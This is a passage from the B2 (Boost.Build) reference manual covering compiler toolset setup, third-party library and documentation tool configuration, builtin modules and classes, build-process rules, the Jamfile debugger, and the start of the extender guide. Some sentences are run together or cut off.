Will not be used in case a target platform specific script has been explicitly specified for the current target platform. Used setup script will be passed the target platform identifier (x86, x86_amd64, x86_ia64, amd64 or ia64) as a parameter. If not specified a default script is chosen based on the used compiler binary, e.g. vcvars32.bator vsvars32.bat. setup-amd64; setup-i386; setup-ia64 The filename of the target platform specific environment setup script to run before invoking any of the tools defined in this toolset. If not specified the global environment setup script is used. 64-bit support Starting with version 8.0, Microsoft Visual Studio can generate binaries for 64-bit processor, both 64-bit flavours of x86 (codenamed AMD64/EM64T), and Itanium (codenamed IA64). In addition, compilers that are itself run in 64-bit mode, for better performance, are provided. The complete list of compiler configurations are as follows (we abbreviate AMD64/EM64T to just AMD64): 32-bit x86 host, 32-bit x86 target 32-bit x86 host, 64-bit AMD64 target 32-bit x86 host, 64-bit IA64 target 64-bit AMD64 host, 64-bit AMD64 target 64-bit IA64 host, 64-bit IA64 target The 32-bit host compilers can be always used, even on 64-bit Windows. On the contrary, 64-bit host compilers require both 64-bit host processor and 64-bit Windows, but can be faster. By default, only 32-bit host, 32-bit target compiler is installed, and additional compilers need to be installed explicitly. To use 64-bit compilation you should: Configure you compiler as usual. If you provide a path to the compiler explicitly, provide the path to the 32-bit compiler. If you try to specify the path to any of 64-bit compilers, configuration will not work. When compiling, use address-model=64, to generate AMD64 code. To generate IA64 code, use architecture=ia64 The (AMD64 host, AMD64 target) compiler will be used automatically when you are generating AMD64 code and are running 64-bit Windows on AMD64. The (IA64 host, IA64 target) compiler will never be used, since nobody has an IA64 machine to test. It is believed that AMD64 and EM64T targets are essentially compatible. The compiler options /favor:AMD64 and /favor:EM64T, which are accepted only by AMD64 targeting compilers, cause the generated code to be tuned to a specific flavor of 64-bit x86. B2 will make use of those options depending on the value of the`instruction-set` feature. Windows Runtime support Starting with version 11.0, Microsoft Visual Studio can produce binaries for Windows Store and Phone in addition to traditional Win32 desktop. To specify which Windows API set to target, use the windows-api feature. Available options are desktop, store, or phone. If not specified, desktop will be used. When using store or phone the specified toolset determines what Windows version is targeted. The following options are available: Windows 8.0: toolset=msvc-11.0 windows-api=store Windows 8.1: toolset=msvc-12.0 windows-api=store Windows Phone 8.0: toolset=msvc-11.0 windows-api=phone Windows Phone 8.1: toolset=msvc-12.0 windows-api=phone For example use the following to build for Windows Store 8.1 with the ARM architecture: .\b2 toolset=msvc-12.0 windows-api=store architecture=arm Sun Studio The sun module supports the Sun Studio C++ compilers for the Solaris OS. The module is initialized using the following syntax: using sun : [version] : [c++-compile-command] : [compiler options] ; This statement may be repeated several times, if you want to configure several versions of the compiler. If the command is not specified, B2 will search for a binary named CC in /opt/SUNWspro/bin and in PATH. When using this compiler on complex C code, such as the C library], it is recommended to specify the following options when initializing the sun module: -library=stlport4 -features=tmplife -features=tmplrefstatic See the Sun C++ Frontend Tales for. Starting with Sun Studio 12, you can create 64-bit applications by using the address-model=64 property. IBM Visual Age The vacpp module supports the IBM Visual Age C++ Compiler, for the AIX operating system. Versions 7.1 and 8.0 are known to work. The module is initialized using the following syntax: using vacpp ; The module does not accept any initialization options. The compiler should be installed in the /usr/vacpp/bin directory. Later versions of Visual Age are known as XL C/C++. They were not tested with the the vacpp module. 6.4.2. Third-party libraries B2 provides special support for some third-party C++ libraries, documented below. STLport library The STLport library is an alternative implementation of C++ runtime library. B2 supports using that library on Windows platform. Linux is hampered by different naming of libraries in each STLport version and is not officially supported. Before using STLport, you need to configure it in user-config.jam using the following syntax: using stlport : version : header-path : library-path ; Where version is the version of STLport, for example 5.1.4, headers is the location where STLport headers can be found, and libraries is the location where STLport libraries can be found. The version should always be provided, and the library path should be provided if you’re using STLport’s implementation of iostreams. Note that STLport 5.* always uses its own iostream implementation, so the library path is required. When STLport is configured, you can build with STLport by requesting stdlib=stlport on the command line. zlib Provides support for the zlib library. zlib can be configured either to use precompiled binaries or to build the library from source. zlib can be initialized using the following syntax using zlib : version : options : condition : is-default ; Options for using a prebuilt library: search The directory containing the zlib binaries. name Overrides the default library name. include The directory containing the zlib headers. If none of these options is specified, then the environmental variables ZLIB_LIBRARY_PATH, ZLIB_NAME, and ZLIB_INCLUDE will be used instead. Options for building zlib from source: Examples: # Find zlib in the default system location using zlib ; # Build zlib from source using zlib : 1.2.7 : <source>/home/steven/zlib-1.2.7 ; # Find zlib in /usr/local using zlib : 1.2.7 : <include>/usr/local/include <search>/usr/local/lib ; # Build zlib from source for msvc and find # prebuilt binaries for gcc. using zlib : 1.2.7 : <source>C:/Devel/src/zlib-1.2.7 : <toolset>msvc ; using zlib : 1.2.7 : : <toolset>gcc ; bzip2 Provides support for the bzip2 library. bzip2 can be configured either to use precompiled binaries or to build the library from source. bzip2 can be initialized using the following syntax using bzip2 : version : options : condition : is-default ; Options for using a prebuilt library: search The directory containing the bzip2 binaries. name Overrides the default library name. include The directory containing the bzip2 headers. If none of these options is specified, then the environmental variables BZIP2_LIBRARY_PATH, BZIP2_NAME, and BZIP2_INCLUDE will be used instead. Options for building bzip2 from source: Examples: # Find bzip in the default system location using bzip2 ; # Build bzip from source using bzip2 : 1.0.6 : <source>/home/sergey/src/bzip2-1.0.6 ; # Find bzip in /usr/local using bzip2 : 1.0.6 : <include>/usr/local/include <search>/usr/local/lib ; # Build bzip from source for msvc and find # prebuilt binaries for gcc. using bzip2 : 1.0.6 : <source>C:/Devel/src/bzip2-1.0.6 : <toolset>msvc ; using bzip2 : 1.0.6 : : <toolset>gcc ; Python python can be initialized using the following syntax using python : [version] : [command-or-prefix] : [includes] : [libraries] : [conditions] : [extension-suffix] ; Options for using python: version The version of Python to use. Should be in Major.Minor format, for example 2.3. Do not include the sub-minor version. command-or-prefix Preferably, a command that invokes a Python interpreter. Alternatively, the installation prefix for Python libraries and includes. If empty, will be guessed from the version, the platform’s installation patterns, and the python executables that can be found in PATH. includes the include path to Python headers. If empty, will be guessed. libraries the path to Python library binaries. If empty, will be guessed. On MacOS/Darwin, you can also pass the path of the Python framework. conditions if specified, should be a set of properties that are matched against the build configuration when B2 selects a Python configuration to use. extension-suffix A string to append to the name of extension modules before the true filename extension. Ordinarily we would just compute this based on the value of the <python-debugging>feature. However ubuntu’s python-dbgpackage uses the windows convention of appending _d to debug-build extension modules. We have no way of detecting ubuntu, or of probing python for the "_d" requirement, and if you configure and build python using --with-pydebug, you’ll be using the standard *nix convention. Defaults to "" (or "_d" when targeting windows and <python-debugging> is set). Examples: # Find python in the default system location using python ; # 2.7 using python : 2.7 ; # 3.5 using python : 3.5 ; # On ubuntu 16.04 using python : 2.7 # version : # Interpreter/path to dir : /usr/include/python2.7 # includes : /usr/lib/x86_64-linux-gnu # libs : # conditions ; using python : 3.5 # version : # Interpreter/path to dir : /usr/include/python3.5 # includes : /usr/lib/x86_64-linux-gnu # libs : # conditions ; # On windows using python : 2.7 # version : C:\\Python27-32\\python.exe # Interperter/path to dir : C:\\Python27-32\\include # includes : C:\\Python27-32\\libs # libs : <address-model>32 <address-model> # conditions - both 32 and unspecified ; using python : 2.7 # version : C:\\Python27-64\\python.exe # Interperter/path to dir : C:\\Python27-64\\include # includes : C:\\Python27-64\\libs # libs : <address-model>64 # conditions ; 6.4.3. Documentation tools B2 support for the Boost documentation tools is documented below. xsltproc To use xsltproc, you first need to configure it using the following syntax: using xsltproc : xsltproc ; Where xsltproc is the xsltproc executable. If xsltproc is not specified, and the variable XSLTPROC is set, the value of XSLTPROC will be used. Otherwise, xsltproc will be searched for in PATH. The following options can be provided, using `<option-name>option-value syntax`: xsl:param Values should have the form name=value xsl:path Sets an additional search path for xi:include elements. catalog A catalog file used to rewrite remote URL’s to a local copy. The xsltproc module provides the following rules. Note that these operate on jam targets and are intended to be used by another toolset, such as boostbook, rather than directly by users. xslt rule xslt ( target : source stylesheet : properties * ) Runs xsltproc to create a single output file. xslt-dir rule xslt-dir ( target : source stylesheet : properties * : dirname ) Runs xsltproc to create multiple outputs in a directory. dirnameis unused, but exists for historical reasons. The output directory is determined from the target. boostbook To use boostbook, you first need to configure it using the following syntax: using boostbook : docbook-xsl-dir : docbook-dtd-dir : boostbook-dir ; docbook-xsl-dir is the DocBook XSL stylesheet directory. If not provided, we use DOCBOOK_XSL_DIR from the environment (if available) or look in standard locations. Otherwise, we let the XML processor load the stylesheets remotely. docbook-dtd-dir is the DocBook DTD directory. If not provided, we use DOCBOOK_DTD_DIR From the environment (if available) or look in standard locations. Otherwise, we let the XML processor load the DTD remotely. boostbook-dir is the BoostBook directory with the DTD and XSL sub-dirs. The boostbook module depends on xsltproc. For pdf or ps output, it also depends on fop. The following options can be provided, using `<option-name>option-value syntax`: format Allowed values: html, xhtml, htmlhelp, onehtml, man, ps, docbook, fo, tests. The formatfeature determines the type of output produced by the boostbook rule. The boostbook module defines a rule for creating a target following the common syntax. boostbook rule boostbook ( target-name : sources * : requirements * : default-build * ) Creates a boostbook target. doxygen To use doxygen, you first need to configure it using the following syntax: using doxygen : name ; name is the doxygen command. If it is not specified, it will be found in the PATH. The doxygen module depends on the boostbook module when generating BoostBook XML. The following options can be provided, using `<option-name>option-value syntax`: doxygen:param All the values of doxygen:paramare added to the doxyfile. prefix Specifies the common prefix of all headers when generating BoostBook XML. Everything before this will be stripped off. reftitle Specifies the title of the library-reference section, when generating BoostBook XML. doxygen:xml-imagedir When generating BoostBook XML, specifies the directory in which to place the images generated from LaTex formulae. The doxygen module defines a rule for creating a target following the common syntax. doxygen rule doxygen ( target : sources * : requirements * : default-build * : usage-requirements * ) Creates a doxygen target. If the target name ends with .html, then this will generate an html directory. Otherwise it will generate BoostBook XML. quickbook The quickbook module provides a generator to convert from Quickbook to BoostBook XML. To use quickbook, you first need to configure it using the following syntax: using quickbook : command ; command is the quickbook executable. If it is not specified, B2 will compile it from source. If it is unable to find the source it will fop The fop module provides generators to convert from XSL formatting objects to Postscript and PDF. To use fop, you first need to configure it using the following syntax: using fop : fop-command : java-home : java ; fop-command is the command to run fop. If it is not specified, B2 will search for it in PATH and FOP_HOME. Either java-home or java can be used to specify where to find java. 6.5. Builtin modules This section describes the modules that are provided by B2. The import rule allows rules from one module to be used in another module or Jamfile. 6.5.1. modules The modules module defines basic functionality for handling modules. A module defines a number of rules that can be used in other modules. Modules can contain code at the top level to initialize the module. This code is executed the first time the module is loaded.will be available without qualification in the caller’s module. Any members of rename-optwill be taken as the names of the rules in the caller’s module, in place of the names they have in the imported module. If rules-opt = '*', all rules from the indicated module are imported into the caller’s module. If rename-optis supplied, it must have the same number of elements as rules-opt.). 6.5.2. path Performs various path manipulations. Paths are always in a 'normalized' representation. In it, a path may be either: ['/'] [ ( '..' '/' )* (token '/')* token ] In plain english, a path can be rooted, '..'elements are allowed only at the beginning, and it never ends in slash, except for the path consisting of slash only. Converts the native path into normalized form. Builds the native representation of the path. Tests if a path is rooted. Tests if a path has a parent. Returns the path without any directory components. Returns the parent directory of the path. If no parent exists, an error is issued. Returns path2such that [ join path path2 ] = ".". The path may not contain Concatenates the passed path elements. Generates an error if any element other than the first one is rooted. Skips any empty or undefined path elements. If pathis relative, it is rooted at root. Otherwise, it is unchanged.. Returns true if the specified file exists. rule all-parents ( path : upper_limit ? : cwd ? ) Find out the absolute name of path and return the list of all the parents, starting with the immediate one. Parents are returned as relative names. If upper_limitis specified, directories above it will be pruned. rule glob-in-parents ( dir : patterns + : upper-limit ? ) patternsin parent directories of dir, up to and including upper_limit, if it is specified, or till the filesystem root otherwise. rule relative ( child parent : no-error ? ) Assuming childis a subdirectory of parent, return the relative path from parentto child. rule relative-to ( path1 path2 ) Returns the minimal path to path2 that is relative path1. Returns the list of paths which are used by the operating system for looking up programs. Creates a directory and all parent directories that do not already exist. 6.5.3. regex a word. "\>" matches the end of a word. rule split ( string separator ) Returns a list of the following substrings: from beginning till the first occurrence of separatoror till the end, between each occurrence of separatorand the next occurrence, from the last occurrence of separatortill the end. If no separator is present, the result will contain only one element. rule split-list ( list * : separator ) Returns the concatenated results of applying regex.split to every element of the list using the separator pattern. rule match ( pattern : string : indices * ) Match stringagainst pattern, and return the elements indicated by indices. rule transform ( list * : pattern : indices * ) Matches all elements of listagainst the patternand returns a list of elements indicated by indicesof all successful matches. If indicesis omitted returns a list of first parenthesized groups of all successful matches. rule escape ( string : symbols : escape-symbol ) Escapes all of the characters in symbolsusing the escape symbol escape-symbolfor. 6.5.4. sequenceof $(sequence)for which [ $(predicate) e ]has a non-null value. rule transform ( function + : sequence * ) Return a new sequence consisting of [ $(function) $(e) ]for each element eof $(sequence). rule reverse ( s * ) Returns the elements of sin reverse order. rule insertion-sort ( s * : ordered * ) Insertion-sort susing the BinaryPredicate ordered. rule merge ( s1 * : s2 * : ordered * ) Merge two ordered sequences using the BinaryPredicate ordered. rule join ( s * : joint ? ) Join the elements of sinto one long string. If jointis supplied, it is used as a separator. rule length ( s * ) Find the length of any sequence. rule unique ( list * : stable ? ) Removes duplicates from list. If stableis passed, then the order of the elements will be unchanged. rule max-element ( elements + : ordered ? ) Returns the maximum number in elements. Uses orderedfor comparisons or numbers.lessif none is provided. rule select-highest-ranked ( elements * : ranks * ) Returns all of elementsfor which the corresponding element in the parallel list rankis equal to the maximum value in rank. 6.5.5. stage This module defines the install rule, used to copy a set of targets to a single location. rule add-install-dir ( name : suffix ? : parent ? : options * ) Defines a named installation directory. For example, add-install-dir foo : bar : baz ;creates feature <install-foo>and adds support for named directory (foo)to installrule. The rule will try to use the value of <install-foo>property if present, otherwise will fallback to (baz)/bar. Arguments: name: the name of the directory. suffix: the path suffix appended to the parent named directory. parent: the optional name of parent named directory. options: special options that modify treatment of the directory. Allowed options: package-suffix: append the package name to the default value. For example: add-install-dir foo : bar : baz : package-suffix ; install (foo) : a : <install-package>xyz ; installs ainto (baz)/bar/xyz. rule install-dir-names ( ) Returns names of all registered installation directories. rule get-dir ( name : property-set : package-name : flags * ) Returns the path to a named installation directory. For a given name=xyzthe rule uses the value of <install-xyz>property if it is present in property-set. Otherwise it tries to construct the default value of the path recursively getting the path to name's registered base named directory and relative path. For example: stage.add-install-dir foo : bar : baz ; local ps = [ property-set.create <install-foo>x/y/z ] ; echo [ stage.get-dir foo : $(ps) : $(__name__) ] ; # outputs x/y/z ps = [ property-set.create <install-baz>a/b/c/d ] ; echo [ stage.get-dir foo : $(ps) : $(__name__) ] ; # outputs a/b/c/d/bar The argument package-nameis used to construct the path for named directories that were registered with package-suffixoption and also to construct install-prefixwhen targeting Windows. Available flags: staged: take staging-prefixinto account. relative: return the path to namerelative to its base directory. rule get-package-name ( property-set : project-module ? ) Returns the package name that will be used for installtargets when constructing installation location. The rule uses the value of <install-package>property if it’s present in property-set. Otherwise it deduces the package name using project-module's attributes. It traverses the project hierarchy up to the root searching for the first project with an id. If none is found, the base name of the root project’s location is used. If project-moduleis empty, the caller module is used (this allows invoking just [ get-package-name $(ps) ]in project jam files). 6.5.6. typebe recognized as targets of type type. Issues an error if a different type is already specified for any of the suffixes. Returns true iff type has been registered. Issues an error if typeis unknown. rule set-scanner ( type : scanner ) Sets a scanner class that will be used for this type. rule get-scanner ( type : property-set ) Returns a scanner instance appropriate to typeand property-set. Returns a base type for the given type or nothing in case the given type is not derived. Returns the given type and all of its base types in order of their distance from type. rule all-derived ( type ) Returns the given type and all of its derived types in order of their distance from type. rule is-derived ( type base ) Returns true if typeis equal to baseor has baseas its direct or indirect base. rule set-generated-target-suffix ( type : properties * : suffix ) Sets a file suffix to be used when generating a target of typewith the specified properties. Can be called with no properties if no suffix has already been specified for the type. The suffixparameter can be an empty string ( Note that this does not cause files with suffixto typewith the given properties. rule set-generated-target-prefix ( type : properties * : prefix ) Sets a target prefix that should be used when generating targets of typewith the specified properties. Can be called with empty properties if no prefix for typehas been specified yet. The prefixparameter can be empty string ( typewith the given properties. Returns file type given its name. If there are several dots in filename, tries each suffix. E.g. for name of "file.so.1.2" suffixes "2", "1", and "so" will be tried. 6.6. Builtin classes 6.6.1. Class abstract-target Base class for all abstract targets. class abstract-target { rule __init__ ( name : project ) rule name ( ) rule project ( ) rule location ( ) rule full-name ( ) rule generate ( property-set ) } Classes derived from abstract-target: project-target main-target basic-target rule init ( name : project ) rule name ( ) Returns the name of this target. rule project ( ) rule location ( ) Returns the location where the target was declared. rule full-name ( ) Returns a user-readable name for this target. rule generate ( property-set ) Generates virtual targets for this abstract target using the specified properties, unless a different value of some feature is required by the target. This is an abstract method which must be overridden by derived classes. On success, returns: a property-set with the usage requirements to be applied to dependents a list of produced virtual targets, which may be empty. If property-setis empty, performs the default build of this target, in a way specific to the derived class. 6.6.2. Class project-target class project-target : abstract-target { rule generate ( property-set ) rule build-dir ( ) rule main-target ( name ) rule has-main-target ( name ) rule find ( id : no-error ? ) # Methods inherited from abstract-target rule name ( ) rule project ( ) rule location ( ) rule full-name ( ) } This class has the following responsibilities: Maintaining a list of main targets in this project and building them. rule generate ( property-set ) Overrides abstract-target.generate. Generates virtual targets for all the targets contained in this project. On success, returns: a property-set with the usage requirements to be applied to dependents a list of produced virtual targets, which may be empty. rule build-dir ( ) Returns the root build directory of the project. rule main-target ( name ) Returns a main-target class instance corresponding to name. Can only be called after the project has been fully loaded. rule has-main-target ( name ) Returns whether a main-target with the specified name exists. Can only be called after the project has been fully loaded. rule find ( id : no-error ? ) Find and return the target with the specified id, treated relative to self. Id may specify either a target or a file name with the target taking priority. May report an error or return nothing if the target is not found depending on the no-errorparameter. 6.6.3. Class main-target class main-target : abstract-target { rule generate ( property-set ) # Methods inherited from abstract-target rule name ( ) rule project ( ) rule location ( ) rule full-name ( ) } A main-target represents a named top-level target in a Jamfile. rule generate ( property-set ) Overrides abstract-target.generate. Select an alternative for this main target, by finding all alternatives whose requirements are satisfied by property-setand picking the one with the longest requirements set. Returns the result of calling generate on that alternative. On success, returns: a property-set with the usage requirements to be applied to dependents a list of produced virtual targets, which may be empty. 6.6.4. Class basic-target class basic-target : abstract-target { rule __init__ ( name : project : sources * : requirements * : default-build * : usage-requirements * ) rule generate ( property-set ) rule construct ( name : source-targets * : property-set ) # Methods inherited from abstract-target rule name ( ) rule project ( ) rule location ( ) rule full-name ( ) } Implements the most standard way of constructing main target alternative from sources. Allows sources to be either files or other main targets and handles generation of those dependency targets. rule init ( name : project : sources * : requirements * : default-build * : usage-requirements * ) rule generate ( property-set ) Overrides abstract-target.generate. Determines final build properties, generates sources, and calls construct. This method should not be overridden. On success, returns: a property-set with the usage requirements to be applied to dependents a list of produced virtual targets, which may be empty. rule construct ( name : source-targets * : property-set ) Constructs virtual targets for this abstract target. Returns a usage-requirements property-set and a list of virtual targets. Should be overridden in derived classes. 6.6.5. Class typed-target class typed-target : basic-target { rule __init__ ( name : project : type : sources * : requirements * : default-build * : usage-requirements * ) rule type ( ) rule construct ( name : source-targets * : property-set ) # Methods inherited from abstract-target rule name ( ) rule project ( ) rule location ( ) rule full-name ( ) # Methods inherited from basic-target rule generate ( property-set ) } typed-target is the most common kind of target alternative. Rules for creating typed targets are defined automatically for each type. rule init ( name : project : type : sources * : requirements * : default-build * : usage-requirements * ) rule type ( ) rule construct ( name : source-targets * : property-set ) Implements basic-target.construct. Attempts to create a target of the correct type using generators appropriate for the given property-set. Returns a property-set containing the usage requirements and a list of virtual targets. 6.6.6. Class property-set Class for storing a set of properties. class property-set { rule raw ( ) rule str ( ) rule propagated ( ) rule add ( ps ) rule add-raw ( properties * ) rule refine ( ps ) rule get ( feature ) } There is 1<→1 correspondence between identity and value. No two instances of the class are equal. To maintain this property, the 'property-set.create' rule should be used to create new instances. Instances are immutable. rule raw ( ) Returns a Jam list of the stored properties. rule str ( ) Returns the string representation of the stored properties. rule propagated ( ) Returns a property-set containing all the propagated properties in this property-set. Returns a new property-set containing the union of the properties in this property-set and in ps. rule add-raw ( properties * ) Link add, except that it takes a list of properties instead of a property-set. Refines properties by overriding any non-free and non-conditional properties for which a different value is specified in ps. Returns the resulting property-set. rule get ( feature ) Returns all the values of feature. 6.7. Build process The general overview of the build process was given in the user documentation. This section provides additional details, and some specific rules. To recap, building a target with specific properties includes the following steps: applying the default build, selecting the main target alternative to use, determining the "common" properties, building targets referred by the the sources list and dependency properties, adding the usage requirements produced when building dependencies to the "common" properties, building the target using generators, computing the usage requirements to be returned. 6.7.1. Alternative selection When a target has several alternatives, one of them must be selected. The process is as follows: For each alternative, its condition is defined as the set of base properties in its requirements. Conditional properties are excluded. An alternative is viable only if all properties in its condition are present in the build request. If there’s only one viable alternative, it’s chosen. Otherwise, an attempt is made to find the best alternative. An alternative a is better than another alternative b, if the set of properties in b’s condition is a strict subset of the set of properties of a’s condition. If one viable alternative is better than all the others, it’s selected. Otherwise, an error is reported. 6.7.2. Determining common properties "Common" properties is a somewhat artificial term. This is the intermediate property set from which both the build request for dependencies and the properties for building the target are derived. Since the default build and alternatives are already handled, we have only two inputs: the build request and the requirements. Here are the rules about common properties. Non-free features can have only one value A non-conditional property in the requirements is always present in common properties. A property in the build request is present in common properties, unless it is overridden by a property in the requirements. If either the build request, or the requirements (non-conditional or conditional) include an expandable property (either composite, or with a specified sub-feature value), the behavior is equivalent to explicitly adding all the expanded properties to the build request or the requirements respectively. If the requirements include a conditional property, and the condition of this property is true in the context of common properties, then the conditional property should be in common properties as well. If no value for a feature is given by other rules here, it has default value in common properties. These rules are declarative. They don’t specify how to compute the common properties. However, they provide enough information for the user. The important point is the handling of conditional requirements. The condition can be satisfied either by a property in the build request, by non-conditional requirements, or even by another conditional property. For example, the following example works as expected: exe a : a.cpp : <toolset>gcc:<variant>release <variant>release:<define>FOO ; 6.7.3. Target Paths Several factors determine the location of a concrete file target. All files in a project are built under the directory bin unless this is overridden B2 6.8. Definitions 6.8.1. Features and properties A feature is a normalized (toolset-independent) aspect of a build configuration, such as whether inlining is enabled. Feature names may not contain the ‘>’ character. Each feature in a build configuration has one or more associated values. Feature values for non-free features may not contain the punctuation characters of pointy bracket (‘ <’), colon (‘ :’ ), equal sign (‘ =’) and dashes (‘ -’). Feature values for free features may not contain the pointy bracket (‘ <’) character. A property is a (feature,value) pair, expressed as <feature>value. A subfeature is a feature that only exists in the presence of its parent feature, and whose identity can be derived (in the context of its parent) from its value. A subfeature’s parent can never be another subfeature. Thus, features and their subfeatures form a two-level hierarchy. A value-string for a feature F is a string of the form value-subvalue1-subvalue2… -subvalueN, where value is a legal value for F and subvalue1… subvalueN are legal values of some of F's subfeatures separated with dashes (‘ <toolset>gcc <toolset-version>3.0.1 can be expressed more concisely using a value-string, as <toolset>gcc-3.0.1. -’). For example, the properties A property set is a set of properties (i.e. a collection without duplicates), for instance: <toolset>gcc <runtime-link>static. A property path is a property set whose elements have been joined into a single string separated by slashes. A property path representation of the previous example would be <toolset>gcc/<runtime-link>static. A build specification is a property set that fully describes the set of features used to build a target. 6.8.2. Property Validity For free features, all values are valid. For all other features, the valid values are explicitly specified, and the build system will report an error for the use of an invalid feature-value. Subproperty validity may be restricted so that certain values are valid only in the presence of certain other subproperties. For example, it is possible to specify that the <gcc-target>mingw property is only valid in the presence of <gcc-version>2.95.2. 6.8.3. Feature Attributes Each feature has a collection of zero or more of the following attributes. Feature attributes are low-level descriptions of how the build system should interpret a feature’s values when they appear in a build request. We also refer to the attributes of properties, so that an incidental property, for example, is one whose feature has the incidental attribute. Incidental features are assumed not to affect build products at all. As a consequence, the build system may use the same file for targets whose build specification differs only in incidental features. A feature that controls a compiler’s warning level is one example of a likely incidental feature. Non-incidental features are assumed to affect build products, so the files for targets whose build specification differs in non-incidental features are placed in different directories as described in Target Paths. Features of this kind are propagated to dependencies. That is, if a main target is built using a propagated property, the build systems attempts to use the same property when building any of its dependencies as part of that main target. For instance, when an optimized executable is requested, one usually wants it to be linked with optimized libraries. Thus, the <optimization>feature is propagated. Most features have a finite set of allowed values, and can only take on a single value from that set in a given build specification. Free features, on the other hand, can have several values at a time and each value can be an arbitrary string. For example, it is possible to have several preprocessor symbols defined simultaneously: <define>NDEBUG=1 <define>HAS_CONFIG_H=1] Normally a feature only generates a sub-variant directory when its value differs from its default value, leading to an asymmetric sub-variant directory structure for certain values of the feature. A symmetric feature always generates a corresponding sub-variant directory. The value of a path feature specifies a path. The path is treated as relative to the directory of Jamfile where path feature is used and is translated appropriately by the build system when the build is invoked from a different directory Values of implicit features alone identify the feature. For example, a user is not required to write "<toolset>gcc", but can simply write "gcc". Implicit feature names also don’t appear in variant paths, although the values do. Thus: bin/gcc/… as opposed to bin/toolset-gcc/…. There should typically be only a few such features, to avoid possible name clashes. Composite features actually correspond to groups of properties. For example, a build variant is a composite feature. When generating targets from a set of build properties, composite features are recursively expanded and added to the build property set, so rules can find them if necessary. Non-composite non-free features override components of composite features in a build property set. The value of a dependency feature is a target reference. When used for building of a main target, the value of dependency feature is treated as additional dependency. For example, dependency features allow to state that library A depends on library B. As the result, whenever an application will link to A, it will also link to B. Specifying B as dependency of A is different from adding B to the sources of A. Features that are neither free nor incidental are called base features. 6.8.4. Feature Declaration The low-level feature declaration interface is the feature rule from the feature module: rule feature ( name : allowed-values * : attributes * ) A feature’s allowed-values may be extended with the feature.extend rule. 6.8.5. Property refinement When a target with certain properties is requested, and that target requires some set of properties, it is needed to find the set of properties to use for building. This process is called property refinement and is performed by these rules Each property in the required set is added to the original property set If the original property set includes property with a different value of non free feature, that property is removed. 6.8.6. Conditional properties Sometime it’s desirable to apply certain requirements only for a specific combination of other properties. For example, one of compilers that you use issues a pointless warning that you want to suppress by passing a command line option to it. You would not want to pass that option to other compilers. Conditional properties allow you to do just that. Their syntax is: property ( "," property ) * ":" property For example, the problem above would be solved by: exe hello : hello.cpp : <toolset>yfc:<cxxflags>-disable-pointless-warning ; The syntax also allows several properties in the condition, for example: exe hello : hello.cpp : <os>NT,<toolset>gcc:<link>static ; 6.8.7. Target identifiers and references Target identifier is used to denote a target. The syntax is: target-id -> (target-name | file-name | project-id | directory-name) | (project-id | directory-name) "//" target-name project-id -> path target-name -> path file-name -> path directory-name -> path This grammar allows some elements to be recognized as either name of target declared in current Jamfile (note that target names may include slash). a regular file, denoted by absolute name or name relative to project’s sources location. project id (at this point, all project ids start with slash). the directory of another project, denoted by absolute name or name relative to the current project’s location. To determine the real meaning the possible interpretations are checked in this order. For example, valid target ids might be: Rationale:Target is separated from project by special separator (not just slash), because: It emphasis that projects and targets are different things. It allows to have main target names with slashes. Target reference is used to specify a source target, and may additionally specify desired properties for that target. It has this syntax: target-reference -> target-id [ "/" requested-properties ] requested-properties -> property-path For example, exe compiler : compiler.cpp libs/cmdline/<optimization>space ; would cause the version of cmdline library, optimized for space, to be linked in even if the compiler executable is build with optimization for speed. 7. Utilities 7.1. Debugger 7.1.1. Overview B2 comes with a debugger for Jamfiles. To run the debugger, start B2 with b2 -dconsole. $ b2 -dconsole (b2db) break gcc.init Breakpoint 1 set at gcc.init (b2db) run Starting program: /usr/bin/b2 Breakpoint 1, gcc.init ( ) at /usr/share/boost-build/tools/gcc.jam:74 74 local tool-command = ; (b2db) quit 7.1.2. Running the Program The run command is used to start a new b2 subprocess for debugging. The arguments to run are passed on the command line. If a child process is already running, it will be terminated before the new child is launched. When the program is paused continue will resume execution. The step command will advance the program by a single statement, stopping on entry to another function or return from the current function. next is like step except that it skips over function calls. finish executes until the current function returns. The kill command terminates the current child immediately. 7.1.3. Breakpoints Breakpoints are set using the break command. The location of the breakpoint can be specified as either the name of a function (including the module name) or or a file name and line number of the form file:line. When a breakpoint is created it is given a unique id which is used to identify it for other commands. (b2db) break Jamfile:10 Breakpoint 1 set at Jamfile:10 (b2db) break msvc.init Breakpoint 2 set at msvc.init A breakpoint can be temporarily disabled using the disable command. While a breakpoint is disabled, the child will not stop when it is hit. A disabled breakpoint can be activated again with enable. (b2db) disable 1 (b2db) enable 1 Breakpoints can be removed permanently with delete or clear. The difference between them is that delete takes the breakpoint id while clear takes the location of the breakpoint as originally specified to break. (b2db) clear Jamfile:10 Deleted breakpoint 1 (b2db) delete 2 7.1.4. Examining the Stack The backtrace command will print a summary of every frame on the stack. The (b2db) print [ modules.peek : ARGV ] /usr/bin/b2 toolset=msvc install (b2db) print $(__file__) Jamfile.jam 8. Extender Manual 8.1. Introduction This section explains how to extend B2 to accommodate your local requirements — primarily to add support for non-standard tools you have. Before we start, be sure you have read and understood the concept of metatarget, Concepts, which is critical to understanding the remaining material. The current version of B2 has three levels of targets, listed below. - metatarget Object that is created from declarations in Jamfiles. May be called with a set of properties to produce concrete targets. - concrete target Object that corresponds to a file or an action. - jam target. 8.1.1. Metatargets. [4] The generate method takes the build properties (as an instance of the property-set class) and returns a list containing: As front element — Usage-requirements from this invocation (an instance of property-set) As subsequent elements — created concrete targets ( instances of the virtual-targetclass.) It’s possible to lookup a metatarget. 8.1.2. Concrete targets specify a name, a type and a project. We also pass the action object created earlier. If the action creates several targets, we can repeat the second line several times. In some cases, code that creates concrete targets may be invoked more than once with the same properties. Returning two different instances of file-target that correspond to the same file clearly will result in problems. Therefore, whenever returning targets you should pass them via the virtual-target.register function, besides allowing B2 to track which virtual targets got created for each metatarget, this will also replace targets with previously created identical ones, as necessary.[5] Here are a couple of examples: return [ virtual-target.register $(t) ] ; return [ sequence.transform virtual-target.register : $(targets) ] ; 8.1.3. Generators In theory, every kind of metatarget in B2 , B2 defines concept of target type and generators. 8.2. Example: 1-to-1 generator Say you’re writing an application that generates C++ code. If you ever did this, you know that it’s not nice. Embedding large portions of C++ code in string literals is very awkward. A much better solution is: Write the template of the code to be generated, leaving placeholders at the points that will change Access the template in your application and replace placeholders with appropriate text. Write the result. B2 can do. First off, B2 B2 sees code.verbatim in a list of sources, it knows that it’s of type VERBATIM. Next, you tell B2 B2. 8.3. Target types The first thing we did in the introduction was declaring a new target type: import type ; type.register VERBATIM : verbatim ; The type is the most important property of a target. B2 can automatically generate necessary build actions only because you specify the desired type (using the different main target rules), and because B2 a special generator for the new type. For example, it 